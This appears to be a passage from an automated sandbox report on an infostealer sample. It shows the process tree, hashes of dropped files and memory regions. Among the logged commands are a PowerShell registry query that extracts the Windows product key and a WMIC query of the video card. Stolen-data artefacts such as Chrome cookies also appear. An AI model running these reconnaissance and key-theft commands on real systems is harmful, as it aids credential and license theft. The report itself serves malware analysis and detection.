                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                      wmic path win32_VideoController get name
                                                                      4⤵
                                                                      • Detects videocard installed
                                                                      PID:2240
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                    3⤵
                                                                      PID:4068
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                        4⤵
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        PID:3860

                                                                Network

                                                                MITRE ATT&CK Enterprise v15

                                                                Replay Monitor

                                                                Loading Replay Monitor...

                                                                Downloads

                                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                  Filesize

                                                                  2KB

                                                                  MD5

                                                                  d85ba6ff808d9e5444a4b369f5bc2730

                                                                  SHA1

                                                                  31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                  SHA256

                                                                  84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                  SHA512

                                                                  8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                  Filesize

                                                                  944B

                                                                  MD5

                                                                  3a6bad9528f8e23fb5c77fbd81fa28e8

                                                                  SHA1

                                                                  f127317c3bc6407f536c0f0600dcbcf1aabfba36

                                                                  SHA256

                                                                  986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05

                                                                  SHA512

                                                                  846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2

                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                  Filesize

                                                                  1KB

                                                                  MD5

                                                                  64643de73c115ced0d13d19715e25357

                                                                  SHA1

                                                                  786379fd7e1bbd15b60ff051590a9bfb9376ff2a

                                                                  SHA256

                                                                  ffaa7b051457c5468dfd084aed37cb36c9cbcdc2ba282bde13780e20e3705d06

                                                                  SHA512

                                                                  67078978743668f267d2a4380393099c220620c2d00a88968386517bd932b1ddb437550e36d77e45eaca2ed11f2ffec49f4d7ac7c34bcdfab0c6c80d9d2d2209

                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                  Filesize

                                                                  944B

                                                                  MD5

                                                                  b801d886e417a9bf405b2f0092e04fe1

                                                                  SHA1

                                                                  fa99fefa2f49af240141692f78c8c28f04205389

                                                                  SHA256

                                                                  57b1c29eef54567fcfdaa28d2923485cb6f77bb76dc54235965fb34f02a42636

                                                                  SHA512

                                                                  b2c8bf95b4c25d7fff388b5f3e04212c43af9588f7aed8a7cb251330ee18c89789eb1d294b8449ec2afeb9b5373d7a6dce8f4369b84cbfb6a7c7813341fa07ff

                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                  Filesize

                                                                  944B

                                                                  MD5

                                                                  9405862a3b15dc34824f6a0e5f077f4f

                                                                  SHA1

                                                                  bbe0000e06be94fa61d6e223fb38b1289908723d

                                                                  SHA256

                                                                  0a0869426bca171c080316948a4638a7152018ea5e07de97b2d51e0d90905210

                                                                  SHA512

                                                                  fc7ae988b81dec5b13ae9878350cd9d063538bfb2bc14f099087836ed54cd77a36bc7c4276fa075a80a3cd20e7620fa2ba5a8b5b7bf98698b10752749187148d

                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                  Filesize

                                                                  1KB

                                                                  MD5

                                                                  a28115a0b99e1628f4b22fe751626704

                                                                  SHA1

                                                                  f6c1a3bb1c46eea1d8ac31551e3b91b2004fc57e

                                                                  SHA256

                                                                  8fe0f9cb43d348eeb8de56f9ccca2ca5b787978f2e41b861bb04a5b134839f60

                                                                  SHA512

                                                                  7ee7051a3dbe621096dcf7c3b2c0ccd6c5ca30729bf3322597b74e8299c742a5653c73b9a7013a2565dc7a0da3de0af4a6fb4c38417748469983bf1117b16ee1

                                                                • C:\Users\Admin\AppData\Local\Temp\RESC822.tmp

                                                                  Filesize

                                                                  1KB

                                                                  MD5

                                                                  79df07471169ec13c60d714e1c9bfc32

                                                                  SHA1

                                                                  3b8536e07da85cd21df499129aca138bc4d655a3

                                                                  SHA256

                                                                  d6991aecdcc0b5168067ba408b0d2ba0518ad1059ea4dba3e109ad3191465861

                                                                  SHA512

                                                                  b5080c584796b9f7c5770e289c554cc2a580ebdf9c81a45ed65ee791f89e7080a73fea6261680ef0c436581d6e691e1d4c0778819d198f6c65a660413af4b5a1

                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI32082\VCRUNTIME140.dll

                                                                  Filesize

                                                                  117KB

                                                                  MD5

                                                                  862f820c3251e4ca6fc0ac00e4092239

                                                                  SHA1

                                                                  ef96d84b253041b090c243594f90938e9a487a9a

                                                                  SHA256

                                                                  36585912e5eaf83ba9fea0631534f690ccdc2d7ba91537166fe53e56c221e153

                                                                  SHA512

                                                                  2f8a0f11bccc3a8cb99637deeda0158240df0885a230f38bb7f21257c659f05646c6b61e993f87e0877f6ba06b347ddd1fc45d5c44bc4e309ef75ed882b82e4e

                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI32082\_bz2.pyd

                                                                  Filesize

                                                                  50KB

                                                                  MD5

                                                                  94309558eb827e8315d0f201bbe7f2b1

                                                                  SHA1

                                                                  b0a511995528860239b595774a1912e8f1220c42

                                                                  SHA256

                                                                  fe14d1af436b07370607c6798c3eb15fc439837cc9cbe7cbc3271b07c9ed55b6

                                                                  SHA512

                                                                  1163da89470b4f4f11786961d2b24a0c01939a174415fac8321f402d85c067572f18d7a8f43ec8abdcc6f14dc76f780ec36004ac34593988240f6a7642e60365

                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI32082\_ctypes.pyd

                                                                  Filesize

                                                                  64KB

                                                                  MD5

                                                                  fc40d41aff12417142c0256e536b4a1a

                                                                  SHA1

                                                                  237157d6af4ec643c4d8480cf3d332951a791cc1

                                                                  SHA256

                                                                  0712d9412ea0d276c9a726765c072e00146f5aea853818d177b1a5b425839641

                                                                  SHA512

                                                                  b7625a5325a5b184b1733931dc3857ea5c118d85a506875dcb6b195c2372723b9c6cf80e4688c0fc1383ea063c9d831dd4c0e10ec429dd0f363aa678b1c99f6b

                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI32082\_decimal.pyd

                                                                  Filesize

                                                                  119KB

                                                                  MD5

                                                                  0e02b5bcde73a3cc01534fba80ec0462

                                                                  SHA1

                                                                  decd14b79adf47cc74085beed8a997552d97b965

                                                                  SHA256

                                                                  286c99901c103d39c3e79bf30ce06f2825260e04ef7d2f0d77fcc08fb93e1d4b

                                                                  SHA512

                                                                  9556fbd408a5f5e0c21212cda2e2c164cd5093bb8668c152db4b72d03944f1f172ac8e0e194b3eedd1d4697ca2e7d50fcc77fe47014eda14ab658648005cb338

                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI32082\_hashlib.pyd

                                                                  Filesize

                                                                  36KB

                                                                  MD5

                                                                  933a6a12d695c7d91ef78a936ab229c7

                                                                  SHA1

                                                                  ff16c267921ed4dd7f2a129df675a2bc6a52be2a

                                                                  SHA256

                                                                  60d239d691eb3e31d99848ba9167b5797c897b2896fa5605e61f5bce08e9cb11

                                                                  SHA512

                                                                  fd5416529061851e90aba6782e1550d9c48d0b10d39f52bd3ff984fbb88d0c06ee54675108508aad819d49362fb6ba74e9d3ad6dd0f3aa17654a07cae6ae099a

                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI32082\_lzma.pyd

                                                                  Filesize

                                                                  87KB

                                                                  MD5

                                                                  042ac1b18a7f6fff8ed09ec9efa9e724

                                                                  SHA1

                                                                  643f3dca141f8fea4609b50907e910be960ce38a

                                                                  SHA256

                                                                  491b8a4f143c7a505e7c36a2279e84aca902e65a1e28aa6d50bcc37dbf6b5334

                                                                  SHA512

                                                                  940a44363d385e4e9fa23c06cf6d013d2585424e6a174e2afbdaa5a0cd21836a5df438859eff45a3b6e70e47322d8c8c5fa5d83315be34cfd6769e8fc2084a21

                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI32082\_queue.pyd

                                                                  Filesize

                                                                  27KB

                                                                  MD5

                                                                  1073d3147f0d6a1880b78a5a5695fc70

                                                                  SHA1

                                                                  d97b690c490a51182e9757c15d14dfefd840e746

                                                                  SHA256

                                                                  65ad239871835a3823401647b2dad935075b4e33a5913fd12d7f2a02b6c49d82

                                                                  SHA512

                                                                  45d046d2e702447aa00bada25d76fe17c3a4c8822ac62739fe820e9eac66c5262323d66ad90cddde31dd01ecd6db0128cd96950e9857c9c5c59524027c75255f

                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI32082\_socket.pyd

                                                                  Filesize

                                                                  45KB

                                                                  MD5

                                                                  fcfdf8cd83a8d506a4483a72eb57026c

                                                                  SHA1

                                                                  74428908c0068c3de2f4281aba16c13cdd28be04

                                                                  SHA256

                                                                  2a6b686817b640dcabc58e60289d9ace9ace3e4bc217d78953439549cee65a8a

                                                                  SHA512

                                                                  3b63e08370fa76ca8c81fc7639492367d250d507f0fb7e0e582078997ba2fa246c48eeaa9faed866dface4fcb08319096a83048dc333ad4be21947f5146b1768

                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI32082\_sqlite3.pyd

                                                                  Filesize

                                                                  59KB

                                                                  MD5

                                                                  1e16d084725d9b79f17ccb1996df7410

                                                                  SHA1

                                                                  3c49ba7b3acf317eedaa7c75319f1b39f91b79ba

                                                                  SHA256

                                                                  cc17586da3a099b45644ce76cd53ffcb3f5836e9db213152e3a880569c50ca7a

                                                                  SHA512

                                                                  4932f891e386792a03f6340ac7c9fe9dfd52e6f4a948951520c24b5f6204b26e3fc9455658e52efdce188a98c1e0f33d86493547dad47517ffafb9bb2c088549

                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI32082\_ssl.pyd

                                                                  Filesize

                                                                  68KB

                                                                  MD5

                                                                  0a56191c7fb0ae4f75de0859aeba458f

                                                                  SHA1

                                                                  6b1c4d1906bea388c6690fe93f12013db959a4f9

                                                                  SHA256

                                                                  e07199062e32fb086f8cb35c36239f1bdfe15ea10f72864fed1953dc0c2dd61c

                                                                  SHA512

                                                                  014b18a33f7ed88f4c326a7981ec670c197d1fba54f7e050c64fe409551cdc89e8fc3ce7205cd8f45cc548c6982e00049e03ea2aeb2360b1c85ce9beb1aa8410

                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI32082\base_library.zip

                                                                  Filesize

                                                                  1.3MB

                                                                  MD5

                                                                  a86edf25ac91a82130f412571e936ac7

                                                                  SHA1

                                                                  8a93eb44eef55f9aafcf00463c8106ba0fd01456

                                                                  SHA256

                                                                  738e955b85c6c415550bd5d1b326fbd1b2c6f34735427c45f1bcb57e05fa7701

                                                                  SHA512

                                                                  9f51eb1c2003039e50566fa2cadde9b4744cd9f7527c8a64e9cf231c346fe40c3042266c96c53c1cb5700155adbffd75b1003aa702c3690dc4bb13fd57e6c08c

                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI32082\blank.aes

                                                                  Filesize

                                                                  116KB

                                                                  MD5

                                                                  26a4db8973aaadfbad2e580660a3663a

                                                                  SHA1

                                                                  9b9b9426747a2f12be9f067011690d0e4b7fe73f

                                                                  SHA256

                                                                  8746367f81b1f87d64b96f4145f187caf8e26d7cf7c08fba7238fd6d78883b0b

                                                                  SHA512

                                                                  8e852f5e4c03316d7cdc16c7e2eb69a109372438e57d6f553c0ee9359b0c3ea3ed447087efce84215e1d095d80c2add5955df6013e9c3a00be89bb0ebd00c974

                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI32082\bound.blank

                                                                  Filesize

                                                                  2.4MB

                                                                  MD5

                                                                  730ac4974fa2f6a182a4ec538db6ef24

                                                                  SHA1

                                                                  d0354a02dc62e00c7f6027d90d2e2fe112cab401

                                                                  SHA256

                                                                  7e7df3f4e9e11051c7d599aa34b9c2ee68b2ee9034c4a069d5995a2cbf904008

                                                                  SHA512

                                                                  994f0c393671eec179b2bd013b06a1bf16e435473f4bb276b3de929f31251563b62a1c7475ac3bf3a72bc750fa70f7f00180317f42f948066ab7dc048b976cb5

                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI32082\libcrypto-3.dll

                                                                  Filesize

                                                                  1.6MB

                                                                  MD5

                                                                  8377fe5949527dd7be7b827cb1ffd324

                                                                  SHA1

                                                                  aa483a875cb06a86a371829372980d772fda2bf9

                                                                  SHA256

                                                                  88e8aa1c816e9f03a3b589c7028319ef456f72adb86c9ddca346258b6b30402d

                                                                  SHA512

                                                                  c59d0cbe8a1c64f2c18b5e2b1f49705d079a2259378a1f95f7a368415a2dc3116e0c3c731e9abfa626d12c02b9e0d72c98c1f91a359f5486133478144fa7f5f7

                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI32082\libffi-8.dll

                                                                  Filesize

                                                                  29KB

                                                                  MD5

                                                                  08b000c3d990bc018fcb91a1e175e06e

                                                                  SHA1

                                                                  bd0ce09bb3414d11c91316113c2becfff0862d0d

                                                                  SHA256

                                                                  135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece

                                                                  SHA512

                                                                  8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI32082\libssl-3.dll

                                                                  Filesize

                                                                  221KB

                                                                  MD5

                                                                  b2e766f5cf6f9d4dcbe8537bc5bded2f

                                                                  SHA1

                                                                  331269521ce1ab76799e69e9ae1c3b565a838574

                                                                  SHA256

                                                                  3cc6828e7047c6a7eff517aa434403ea42128c8595bf44126765b38200b87ce4

                                                                  SHA512

                                                                  5233c8230497aadb9393c3ee5049e4ab99766a68f82091fe32393ee980887ebd4503bf88847c462c40c3fc786f8d179dac5cb343b980944ade43bc6646f5ad5a

                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI32082\python313.dll

                                                                  Filesize

                                                                  1.8MB

                                                                  MD5

                                                                  2a4aad7818d527bbea76e9e81077cc21

                                                                  SHA1

                                                                  4db3b39874c01bf3ba1ab8659957bbc28aab1ab2

                                                                  SHA256

                                                                  4712a6bb81b862fc292fcd857cef931ca8e4c142e70eaa4fd7a8d0a96aff5e7e

                                                                  SHA512

                                                                  d10631b7fc25a8b9cc038514e9db1597cec0580ee34a56ce5cfc5a33e7010b5e1df7f15ec30ebb351356e2b815528fb4161956f26b5bfaf3dce7bc6701b79c68

                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI32082\rar.exe

                                                                  Filesize

                                                                  615KB

                                                                  MD5

                                                                  9c223575ae5b9544bc3d69ac6364f75e

                                                                  SHA1

                                                                  8a1cb5ee02c742e937febc57609ac312247ba386

                                                                  SHA256

                                                                  90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

                                                                  SHA512

                                                                  57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI32082\rarreg.key

                                                                  Filesize

                                                                  456B

                                                                  MD5

                                                                  4531984cad7dacf24c086830068c4abe

                                                                  SHA1

                                                                  fa7c8c46677af01a83cf652ef30ba39b2aae14c3

                                                                  SHA256

                                                                  58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

                                                                  SHA512

                                                                  00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI32082\select.pyd

                                                                  Filesize

                                                                  26KB

                                                                  MD5

                                                                  fbb31cb3990b267f9c5fb02d1aa21229

                                                                  SHA1

                                                                  cdae1c90d80c81927edb533fb5850c6efd541812

                                                                  SHA256

                                                                  8e2c5b74031b80a20bd16c149a389e60b3845d9719d97e030c42e9718cc08937

                                                                  SHA512

                                                                  af71f8be59d062cb4d095772e30ba63d0fef1e8285d549d7638c009cd67a2610f6d07e486e75f3eb1d94d8dc349d92b996f3ef83bd1d1c3617ac801d571be439

                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI32082\sqlite3.dll

                                                                  Filesize

                                                                  645KB

                                                                  MD5

                                                                  a7a7f5664333083d7270b6f6373c18b2

                                                                  SHA1

                                                                  f8b7729e18c1dad2974514fc685aaa05ed3ff513

                                                                  SHA256

                                                                  85b1d4d0b7db01ecb9b8c6b1b68ab122e0807eaa607551ba08849fdd957b889a

                                                                  SHA512

                                                                  cd9a0d4a55a58f18ce565f1525339e84f22496b6264f1fa235310ff6fa3531a0b24fe6e90bdf21b8f9ef2556e726480fe3bd7e69d737f5a580d6bd3e0b8d799f

                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI32082\unicodedata.pyd

                                                                  Filesize

                                                                  261KB

                                                                  MD5

                                                                  48a942c3930a1fee7d4404989171f5fb

                                                                  SHA1

                                                                  b6ea31aedbc3d17136b7c7015f687020dd8723d4

                                                                  SHA256

                                                                  bc52593f047cba026641ebd758133551289dcca17817c836cbb006d4529d7aa7

                                                                  SHA512

                                                                  dcea8380f7c7a38cc827bd685cd76ac4d3dc2635f42675f5afaa8ab9e07fb72fc5f6e6fc246bb82f88bf8459caa09f4a0dd6c0d145e245986cfd15d0a49d1c59

                                                                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jloun4rf.fgs.ps1

                                                                  Filesize

                                                                  60B

                                                                  MD5

                                                                  d17fe0a3f47be24a6453e9ef58c94641

                                                                  SHA1

                                                                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                  SHA256

                                                                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                  SHA512

                                                                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                • C:\Users\Admin\AppData\Local\Temp\bound.exe

                                                                  Filesize

                                                                  2.9MB

                                                                  MD5

                                                                  f227cdfd423b3cc03bb69c49babf4da3

                                                                  SHA1

                                                                  3db5a97d9b0f2545e7ba97026af6c28512200441

                                                                  SHA256

                                                                  cb5d6c1ca0aa6232a2d55e14b20ac4a9945a0bd063c57d60a5ed3ae94160e3e8

                                                                  SHA512

                                                                  b10afd03b02a928545c16fad39a6ae46b68b1e1a2477a6990803ce80008e7161fb2ebc9380ba15a1b074bb436aa34bcd6c94a922933d438b1c22489717e1e10e

                                                                • C:\Users\Admin\AppData\Local\Temp\rn2425bf\rn2425bf.dll

                                                                  Filesize

                                                                  4KB

                                                                  MD5

                                                                  d28d00f9865750dd8028763e821180d1

                                                                  SHA1

                                                                  52c7920eb239697dc164125ded0814e12b31574b

                                                                  SHA256

                                                                  7390e806f2382cf808b980bbe584dc68365f7faec0123af67fde1cd1a58ad646

                                                                  SHA512

                                                                  c99c42d489808b3c0b7c117a076a6f3c8e912996124499215436ef662448ce569a848aa3bd0dbf66360bbde3d0ae2bb074254b991c8ea40ea79183c4799ab508

                                                                • C:\Users\Admin\AppData\Local\Temp\ ‍ ‏ ‏    \Credentials\Chrome\Chrome Cookies.txt

                                                                  Filesize

                                                                  266B

                                                                  MD5

                                                                  953d7677e53882a3a4371c6930210872

                                                                  SHA1

                                                                  bc7e83aab72a17901d97ea94132516c0e8a8d8a7

                                                                  SHA256

                                                                  ee8c1067111a57765db9a9e4733e0b4076c300689e7faf889bb973c157381ce1

                                                                  SHA512

                                                                  44121b20855b93411155fce4bd1524f1b8ebcceef16f137cdd0b2268587046acc4862bd97f8bea4fde7dda3a8c79fdc365f642d802d5e9f622ee1896cc57b33d

                                                                • C:\Users\Admin\AppData\Local\Temp\ ‍ ‏ ‏    \Directories\Desktop.txt

                                                                  Filesize

                                                                  657B

                                                                  MD5

                                                                  a9bad33e0c343c0370925f653e04d375

                                                                  SHA1

                                                                  bc86f896c8867fc5ad0e7c8eb290b1660006983c

                                                                  SHA256

                                                                  85473a1344fff93dbb956c892610d9b410d7d2fa1f2a546fe29c57612a14ea80

                                                                  SHA512

                                                                  7590e8b554a6fadae8ef357f3851d0a1de309c4d45bc429f525032b2b1c51374166d9044717931a562418951b368c921b42efdbdfa4b5b690f4502db7b98458b

                                                                • C:\Users\Admin\AppData\Local\Temp\ ‍ ‏ ‏    \Directories\Documents.txt

                                                                  Filesize

                                                                  743B

                                                                  MD5

                                                                  4c13ed67224f204c60e5f931efeb5ef1

                                                                  SHA1

                                                                  f6271f8dddd09cab4853c4043973817b1597d780

                                                                  SHA256

                                                                  ef29722c01aff7f413846f05abd84c248557ef8639c89b9a8d43b737e8620bab

                                                                  SHA512

                                                                  f95a9dc10116dfa419e37bd0067821e849b183ae6d129fa146865a53593714897edb43757e8bed381eb6be3df067864bef939112014f21ca665a357a18e24c53

                                                                • C:\Users\Admin\AppData\Local\Temp\ ‍ ‏ ‏    \Directories\Downloads.txt

                                                                  Filesize

                                                                  788B

                                                                  MD5

                                                                  6e0467b5c41fb1a7394d75833276eccc

                                                                  SHA1

                                                                  1ce9538d91cbdc5ca8a8bf0336d57b59ad4c47bb

                                                                  SHA256

                                                                  8d49b7937df7154ffbf5261ef004c4f92416a3640d4d78bf5da57226f05da3b8

                                                                  SHA512

                                                                  08ce5dd04c65972ca47823b378c6aa80a3f20b080bb9cfe318fc2f1b3e97188076d212f2919ef06956654d3391ebc1d9e3cdc9d70a6ef00d016345a093f8515a

                                                                • C:\Users\Admin\AppData\Local\Temp\ ‍ ‏ ‏    \Directories\Music.txt

                                                                  Filesize

                                                                  706B

                                                                  MD5

                                                                  ba34a0bb68b95935f40152bfcafd858e

                                                                  SHA1

                                                                  16bf133ff2910bee45fa8d94adffa16d7b54632a

                                                                  SHA256

                                                                  1598055e7fd8a34f85c1f696c803c21ad4ee96f3d61beab627084132f3303b97

                                                                  SHA512

                                                                  4692a853128f392dac405cb22d3fe6f7b5596d9b60002eea88f084c429741056ad633674182888d6e869633639bcde1b81efaadb8c74e77e1170e35b3c0f4473

                                                                • C:\Users\Admin\AppData\Local\Temp\ ‍ ‏ ‏    \Directories\Pictures.txt

                                                                  Filesize

                                                                  380B

                                                                  MD5

                                                                  56cb0243286a978c66069c91ef9ff866

                                                                  SHA1

                                                                  146307674cb8d9bc4ae5509438eef7695854a685

                                                                  SHA256

                                                                  ed7bea118399f1bbef12e40b4cfa742f8bdd8210b27b82d8e2a6d7066aed3abf

                                                                  SHA512

                                                                  7ef714b507947c0b1b804598a58688bf1f9f5478fe57a7ae09d10efcb6657d9617e52908c318808e2f694baa0a817be55a13177d62e71fd884b4bb55bc272863

                                                                • C:\Users\Admin\AppData\Local\Temp\ ‍ ‏ ‏    \Directories\Videos.txt

                                                                  Filesize

                                                                  30B

                                                                  MD5

                                                                  e140e10b2b43ba6f978bee0aa90afaf7

                                                                  SHA1

                                                                  bbbeb7097ffa9c2daa3206b3f212d3614749c620

                                                                  SHA256

                                                                  c3a706e5567ca4eb3e18543296fa17e511c7bb6bef51e63bf9344a59bf67e618

                                                                  SHA512

                                                                  df5b92757bf9200d0945afda94204b358b9f78c84fbaeb15bdf80eae953a7228f1c19fdf53ed54669562b8f0137623ea6cee38f38ef23a6f06de1673ff05733f

                                                                • C:\Users\Admin\AppData\Local\Temp\ ‍ ‏ ‏    \Display (1).png

                                                                  Filesize

                                                                  423KB

                                                                  MD5

                                                                  06542c4592cb26b535b0613d4393b637

                                                                  SHA1

                                                                  eee3b196e4e259aaac12b679c41893e1bebaca26

                                                                  SHA256

                                                                  8a49f0df510a028c2c81edad4d440ac8396bf34ad205e8c850807331c9575eb1

                                                                  SHA512

                                                                  5e21a70cdd1a45a704c5bb671cb68e515f113aa5d8543039a1715f117494554dbe7502a4b284ac06bee6e94d11e20d2f19a527d48feb178629452f17b6647d74

                                                                • C:\Windows\System32\drivers\etc\hosts

                                                                  Filesize

                                                                  2KB

                                                                  MD5

                                                                  f99e42cdd8b2f9f1a3c062fe9cf6e131

                                                                  SHA1

                                                                  e32bdcab8da0e3cdafb6e3876763cee002ab7307

                                                                  SHA256

                                                                  a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

                                                                  SHA512

                                                                  c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

                                                                • \??\c:\Users\Admin\AppData\Local\Temp\rn2425bf\CSCDBF5C1098F746209C589BA3A6CE42AA.TMP

                                                                  Filesize

                                                                  652B

                                                                  MD5

                                                                  442d7f262870a701f0a7c94ba094476f

                                                                  SHA1

                                                                  0e97e24246b60f7d8a10ac78b9dabc6aed52f8d1

                                                                  SHA256

                                                                  b2d8ba48352224f52779c362c11c829c77043a34740062710605bf551ad7771d

                                                                  SHA512

                                                                  f688d5d2511d3a749e3c9ac5b1773deae99439c44ab4ea723166f4713a20008c3cea9bd1313589041490cf33af2ae4e31197dd8faeb6c7e8b6120a59d2c63e17

                                                                • \??\c:\Users\Admin\AppData\Local\Temp\rn2425bf\rn2425bf.0.cs

                                                                  Filesize

                                                                  1004B

                                                                  MD5

                                                                  c76055a0388b713a1eabe16130684dc3

                                                                  SHA1

                                                                  ee11e84cf41d8a43340f7102e17660072906c402

                                                                  SHA256

                                                                  8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

                                                                  SHA512

                                                                  22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

                                                                • \??\c:\Users\Admin\AppData\Local\Temp\rn2425bf\rn2425bf.cmdline

                                                                  Filesize

                                                                  607B

                                                                  MD5

                                                                  2a8404abbb4545a2eb99475a49668e7b

                                                                  SHA1

                                                                  e9aa0a0cd1c0a563f2482c4fa278c19a541c5efc

                                                                  SHA256

                                                                  3d910b8617c4dd487a8e29305274afe208a4f3ba330a96310b0aa29e6c91284e

                                                                  SHA512

                                                                  5f3c06d5bb34d8497ec38b063ac7abecdf0bd1017ecfa0063fca611cb3f38a7476d0313c076d4ed7558752a331673f059f7c796a07757ec6fd57d87d7767b1ea

                                                                • memory/2480-149-0x00000230342A0000-0x00000230342B6000-memory.dmp

                                                                  Filesize

                                                                  88KB

                                                                • memory/2480-152-0x00000230342D0000-0x00000230342D8000-memory.dmp

                                                                  Filesize

                                                                  32KB

                                                                • memory/2480-109-0x0000023019B20000-0x0000023019B30000-memory.dmp

                                                                  Filesize

                                                                  64KB

                                                                • memory/2480-131-0x0000023033E80000-0x0000023033E88000-memory.dmp

                                                                  Filesize

                                                                  32KB

                                                                • memory/2480-145-0x0000023037A30000-0x0000023037B30000-memory.dmp

                                                                  Filesize

                                                                  1024KB

                                                                • memory/2480-150-0x0000023034040000-0x000002303404A000-memory.dmp

                                                                  Filesize

                                                                  40KB

                                                                • memory/2480-102-0x0000023019430000-0x0000023019712000-memory.dmp

                                                                  Filesize

                                                                  2.9MB

                                                                • memory/2480-148-0x0000023034050000-0x0000023034058000-memory.dmp

                                                                  Filesize

                                                                  32KB

                                                                • memory/2480-147-0x0000023034010000-0x0000023034036000-memory.dmp

                                                                  Filesize

                                                                  152KB

                                                                • memory/2480-146-0x0000023033FF0000-0x0000023033FFA000-memory.dmp

                                                                  Filesize

                                                                  40KB

                                                                • memory/2480-144-0x0000023033ED0000-0x0000023033EDE000-memory.dmp

                                                                  Filesize

                                                                  56KB

                                                                • memory/2480-143-0x0000023034260000-0x0000023034298000-memory.dmp

                                                                  Filesize

                                                                  224KB

                                                                • memory/2480-151-0x0000023034000000-0x000002303400A000-memory.dmp

                                                                  Filesize

                                                                  40KB

                                                                • memory/3772-200-0x000001F1D7660000-0x000001F1D7B93000-memory.dmp

                                                                  Filesize

                                                                  5.2MB

                                                                • memory/3772-50-0x00007FFACC9C0000-0x00007FFACC9CF000-memory.dmp

                                                                  Filesize

                                                                  60KB

                                                                • memory/3772-87-0x00007FFAB3B70000-0x00007FFAB3CEF000-memory.dmp

                                                                  Filesize

                                                                  1.5MB

                                                                • memory/3772-86-0x00007FFAB30A0000-0x00007FFAB3153000-memory.dmp

                                                                  Filesize

                                                                  716KB

                                                                • memory/3772-171-0x00007FFAC2820000-0x00007FFAC2853000-memory.dmp

                                                                  Filesize

                                                                  204KB

                                                                • memory/3772-85-0x00007FFAC7160000-0x00007FFAC7185000-memory.dmp

                                                                  Filesize

                                                                  148KB

                                                                • memory/3772-79-0x00007FFAC7AA0000-0x00007FFAC7AAD000-memory.dmp

                                                                  Filesize

                                                                  52KB

                                                                • memory/3772-77-0x00007FFAC78B0000-0x00007FFAC78C4000-memory.dmp

                                                                  Filesize

                                                                  80KB

                                                                • memory/3772-75-0x000001F1D7660000-0x000001F1D7B93000-memory.dmp

                                                                  Filesize

                                                                  5.2MB

